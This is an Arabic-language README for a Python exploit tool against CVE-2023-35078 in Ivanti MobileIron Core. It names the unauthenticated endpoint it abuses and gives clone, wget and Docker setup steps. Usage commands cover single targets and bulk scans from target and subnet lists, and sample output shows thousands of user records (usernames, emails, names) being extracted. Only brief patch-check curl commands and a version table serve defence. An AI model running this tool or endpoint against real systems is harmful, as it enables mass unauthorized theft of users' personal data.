
CVE-2023-35078 - أداة استغلال وصول غير مصرح به لواجهة برمجة التطبيقات عن بُعد لـ Ivanti MobileIron Core
██████╗ ███╗ ██╗███████╗███████╗ ██████╗
██╔═████╗████╗ ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗ ██║
████╔╝██║██║╚██╗██║╚════██║██╔══╝ ██║
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
╚═════╝ ╚═╝ ╚═══╝╚══════╝╚══════╝ ╚═════╝
[+] CVE-2023-35078 - وصول غير مصادق إليه API عن بُعد في Ivanti MobileIron Core
أداة إثبات مفهوم مبنية على بايثون لاستغلال CVE-2023-35078، والتي تستهدف ثغرة الوصول غير المصادق إليه API عن بُعد في أنظمة Ivanti MobileIron Core.
CVE-2023-35078 هي ثغرة خطيرة تؤثر على Ivanti MobileIron Core تسمح للمهاجمين غير المصادقين عن بُعد بالوصول إلى نقاط API حساسة واستخراج بيانات المستخدمين دون أي مصادقة.
توجد الثغرة في آلية مصادقة API لـ MobileIron Core، تحديدًا في النقطة النهائية /mifs/aad/api/v2/authorized/users. تفشل النقطة النهائية في التحقق بشكل صحيح من رموز المصادقة، مما يسمح بالوصول غير المصرح به إلى معلومات حساسة للمستخدمين تشمل:
# استنساخ المستودع
git clone https://github.com/0nsec/cve-2023-35078-exploit.git
cd cve-2023-35078-exploit
# تثبيت التبعيات
pip3 install -r requirements.txt
# جعل الملف قابلاً للتنفيذ (Linux/macOS)
chmod +x cve_2023_35078.py
# إنشاء دليل المشروع
mkdir cve-2023-35078-exploit
cd cve-2023-35078-exploit
# تنزيل السكريبت
wget https://raw.githubusercontent.com/0nsec/cve-2023-35078-exploit/main/cve_2023_35078.py
# تثبيت الحزم المطلوبة
pip3 install requests urllib3 termcolor argparse
FROM python:3.9-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install -r requirements.txt
COPY cve_2023_35078.py .
ENTRYPOINT ["python3", "cve_2023_35078.py"]
# بناء وتشغيل مع Docker
docker build -t cve-2023-35078 .
docker run -v $(pwd)/results:/app/results cve-2023-35078 -u https://target.com
# اختبار هدف واحد
python3 cve_2023_35078.py -u https://mobileiron.example.com
# اختبار أهداف متعددة من ملف
python3 cve_2023_35078.py -f targets.txt
# وضع مفصل مع دليل مخرجات مخصص
python3 cve_2023_35078.py -f targets.txt -o ./results -v
# إعدادات مهلة ومخرجات مخصصة
python3 cve_2023_35078.py -u https://target.com -t 30 -o ./scan_results -v
# تقييم شامل للمؤسسة
python3 cve_2023_35078.py -f corporate_assets.txt -o ./audit_results -t 30 -v
# هدف واحد مع تسجيل مفصّل
python3 cve_2023_35078.py -u https://mobileiron.target.com -v > detailed_log.txt
# مسح دفعات مع مهلة مخصصة
python3 cve_2023_35078.py -f subnet_scan.txt -t 5 -o ./batch_results
# فحص سريع للثغرة (بدون مخرجات مفصلة)
python3 cve_2023_35078.py -u https://quick.check.com -t 5
██████╗ ███╗ ██╗███████╗███████╗ ██████╗
██╔═████╗████╗ ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗ ██║
████╔╝██║██║╚██╗██║╚════██║██╔══╝ ██║
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
╚═════╝ ╚═╝ ╚═══╝╚══════╝╚══════╝ ╚═════╝
[*] الهدف: https://vulnerable.mobileiron.com
------------------------------------------------------------
[*] التحقق من الإصدار لـ: https://vulnerable.mobileiron.com
[*] تم الكشف عن الإصدار: 11.3
[+] الهدف يبدو معرضًا للخطر!
[*] محاولة استغلال: https://vulnerable.mobileiron.com
[*] محاولة النقطة النهائية: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[+] نجاح! تم العثور على 1,247 مستخدمًا
[+] تم حفظ النتائج في: ./results/vulnerable_mobileiron_com_20250821_055013.json
[+] تم استخراج 1247 سجل مستخدم
[*] حقول نموذجية: ['id', 'username', 'email', 'firstName', 'lastName']...
============================================================
[*] اكتمل الفحص!
[*] الأهداف التي تمت معالجتها: 1
[*] عمليات الاستغلال الناجحة: 1
[!] تحذير: تم العثور على نظام (أنظمة) معرضة للخطر!
[!] تأكد من الحصول على التصريح المناسب قبل الاختبار!
[*] التحقق من الإصدار لـ: https://test.mobileiron.com
[*] محاولة النقطة النهائية: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[*] HTTP 200 - طول الاستجابة: 45,123 بايت
[*] تحليل JSON بنجاح
[*] تم العثور على هيكل بيانات المستخدم مع 234 سجلًا
[+] نجاح! تم العثور على 234 مستخدمًا
[*] بيانات مستخدم نموذجية: {'id': '12345', 'username': '[email protected]'}
[+] تم حفظ النتائج في: ./results/test_mobileiron_com_20250821_055013.json
# التحقق من الإصدار الحالي
curl -k https://mobileiron-server/mifs/css/ui.login.css | grep -o "11\.[0-9]"
# التحقق من أن النقاط النهائية المصححة ترجع 401/403
curl -k "https://mobileiron-server/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"
| الإصدار | معرض للخطر | التصحيح متوفر | مستوى التصحيح | تاريخ الإصدار |
|---|
| 11.2.x | نعم | متوفر | CU21+ | 2023-07-25 |
| 11.3.x | نعم | متوفر | CU18+ | 2023-07-25 |
| 11.4.x | نعم | متوفر | CU8+ | 2023-07-25 |
| 11.5.x+ | لا | غير متاح | غير متاح | غير متاح |